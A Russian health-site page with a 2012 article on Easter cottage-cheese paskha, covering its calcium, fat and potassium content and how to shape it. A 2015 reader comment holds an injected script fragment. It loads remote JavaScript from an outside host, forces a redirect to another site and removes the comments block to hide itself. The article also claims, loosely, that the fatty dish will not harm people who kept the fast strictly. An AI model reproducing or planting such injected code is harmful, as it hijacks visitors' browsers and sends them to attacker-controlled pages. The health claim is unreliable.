Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Творожная пасха: как подг...  >>  Творожная пасха: как подготовиться к празднику
 
Обратная связь
 

Творожная пасха: как подготовиться к празднику

Размер шрифта
11 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Пасха к празднику Пасхи делается по специальному рецепту: с маслом, сметаной, орехами, сухофруктами. Насколько полезно это праздничное блюда и как его правильно приготовить?

  1. Творог. Изначально творог перетирали, клали под гнет, а сыворотку сцеживали. Получался сильно концентрированный молочный продукт. В таком продукте содержание кальция максимально. Кальций необходим для крепости костей.

  2. В творог добавляется масло и сметана, жирные, богатые холестерином продукты. Эти компоненты увеличивают риск развития атеросклероза. При атеросклерозе сосуды сужаются, что может привести к инфаркту и инсульту. Впрочем, если вы строго соблюдали Великий пост, такой жирный и калорийный продукт вам не повредит.

  3. Орехи, цукаты, сухофрукты тоже добавляются в пасху. Сухофрукты богаты калием. Калий – это антагонист натрия, способствующего задержке жидкости, образованию отеков, повышению давления. Калий приводит в порядок давление, снижает количество отеков. Определить отек нетрудно: при надавливании на отекший участок ямка не исчезает. Это называется пастозность, или внешний признак отека.

Что делать с готовой творожной массой?

Ее надо сформировать. Это делается либо с помощью пластиковой формы, либо с помощью деревянной. По своей форме получившаяся фигура напоминает Церковь Пресвятой Троицы. Через 12 часов, когда пасха застынет, форму снимают. Пасху готовят к празднику и, перед тем, как подавать на стол, освящают в церкви в канун Пасхи.

Сюжеты по теме:
Творожная пасха

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда после застолья   В вопросе ГМО поставлена точка! Есть или не есть?   Пасхальный кулич с пользой   Сыр домашний для здоровья костей  

Слайдшоу

Ошибки в еде, которые вы точно делаете!    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.